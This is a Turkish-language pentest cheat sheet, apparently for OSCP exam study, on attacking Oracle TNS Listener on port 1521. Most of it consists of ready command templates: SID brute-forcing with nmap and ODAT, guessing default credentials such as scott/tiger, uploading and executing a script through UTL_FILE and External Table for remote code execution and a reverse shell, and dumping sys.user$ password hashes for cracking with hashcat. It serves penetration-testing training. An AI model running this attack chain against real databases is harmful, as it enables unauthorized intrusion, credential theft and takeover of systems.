FOOTHOLD Metodoloji Cheat-sheet
1521

Oracle TNS

linux

Oracle TNS Listener: tnscmd/odat ile enumeration, SID brute-force, varsayilan kimlik bilgileri, ODAT ile dosya yukleme ve RCE.

┌──

Komutlar

nmap ✓ EXAM-SAFE
nmap -sV -p {{RPORT}} --script=oracle-tns-version,oracle-sid-brute {{RHOST}}
TNS surum tespiti ve SID brute-force NSE scripti. HackTricks — 1521 Pentesting Oracle TNS
tnscmd10g ✓ EXAM-SAFE
tnscmd10g version -h {{RHOST}} -p {{RPORT}}
TNS Listener'a version komutu gonderip surum/yapi bilgisi alma. HackTricks — 1521 Pentesting Oracle TNS
tnscmd10g ✓ EXAM-SAFE
tnscmd10g status -h {{RHOST}} -p {{RPORT}}
Listener status sorgusu (eski/unpatched listener'larda SID ve servis isimleri sizar). HackTricks — 1521 Pentesting Oracle TNS
odat ⚠ RESTRICTED
odat all -s {{RHOST}} -p {{RPORT}}
ODAT ile kapsamli otomatik enumeration ve zafiyet taramasi. ODAT — Oracle Database Attacking Tool
odat ✓ EXAM-SAFE
odat sidguesser -s {{RHOST}} -p {{RPORT}}
ODAT ile SID tahmin/brute-force. ODAT — Oracle Database Attacking Tool
odat ✓ EXAM-SAFE
odat passwordguesser -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} --accounts-file accounts/accounts_multiple.txt
Belirlenen SID'ye karsi varsayilan kullanici/parola brute-force. ODAT — Oracle Database Attacking Tool
sqlplus ✓ EXAM-SAFE
sqlplus {{USER}}/{{PASS}}@{{RHOST}}:{{RPORT}}/{{DOMAIN}}
sqlplus ile baglanti (SID/service name DOMAIN yerine girilir). HackTricks — 1521 Pentesting Oracle TNS
odat ⚠ RESTRICTED user
odat utlfile -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --putFile /tmp sh.sh ./sh.sh
UTL_FILE ile hedefe dosya yukleme (webshell/script). ODAT — Oracle Database Attacking Tool
odat ⚠ RESTRICTED user
odat externaltable -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --exec /tmp sh.sh
External Table ile yuklenen scripti calistirma (RCE). ODAT — Oracle Database Attacking Tool

Genel Bakis

Oracle TNS Listener (1521) OSCP’de nadir ama yuksek deger tasir. Saldiri zinciri: SID kesfi -> kullanici/parola brute -> ODAT ile dosya yukleme/RCE seklindedir. Kali’de odat ve oracle instantclient (sqlplus) kurulu olmali.

Enumeration

  • nmap oracle-tns-version ve oracle-sid-brute ile baslanir.
  • tnscmd10g version/status eski listener’larda dogrudan SID ve servis isimlerini sizdirabilir; yeni surumlerde status yetki ister.
  • SID kritik: dogru SID/service name olmadan baglanamazsiniz. odat sidguesser veya nmap brute ile bul.

Kimlik Dogrulama / Varsayilan Kimlik Bilgileri

  • Klasik varsayilanlar: system/manager, sys/change_on_install, scott/tiger, dbsnmp/dbsnmp, outln/outln.
  • odat passwordguesser ODAT’in account listesiyle bunlari otomatik dener.
  • Bulunan kredlerle sqlplus user/pass@host:port/SID ile baglan; sys icin as sysdba ekle.

RCE / Dosya Yukleme

  • ODAT modulleri: utlfile (dosya yukle), externaltable (yuklenen scripti calistir), dbmsscheduler (zamanlanmis gorevle komut), java (Java stored proc ile komut).
  • Genel zincir: UTL_FILE ile script yukle -> External Table veya Scheduler ile calistir -> reverse shell.
  • Bu moduller otomatik istismar sayildigi icin examSafety restricted; OSCP sinavinda kullanim oncesi kapsam/kisitlamalari teyit edin.

Loot / Pivot Notlari

  • Baglandiktan sonra SELECT * FROM all_users; ve SELECT name, password, spare4 FROM sys.user$; ile hash’leri cek (DBA gerekli).
  • Oracle hash’leri hashcat ile kirilabilir (mode 3100 DES, mode 112 11g SHA1).
  • RCE genelde oracle OS kullanicisi verir; oradan local privesc’e gec.
┌──

İlgili teknikler

Linux PrivEsc Enumeration Metodolojisi (linpeas / LinEnum / pspy / Manuel Checklist)Servis Exploit & Varsayılan Kimlik Bilgisi İş Akışı
┌──

Kaynaklar

↗ HackTricks — 1521 Pentesting Oracle TNS Listener↗ ODAT — Oracle Database Attacking Tool↗ HackTricks — Oracle SID/Account bruteforce
0/15 set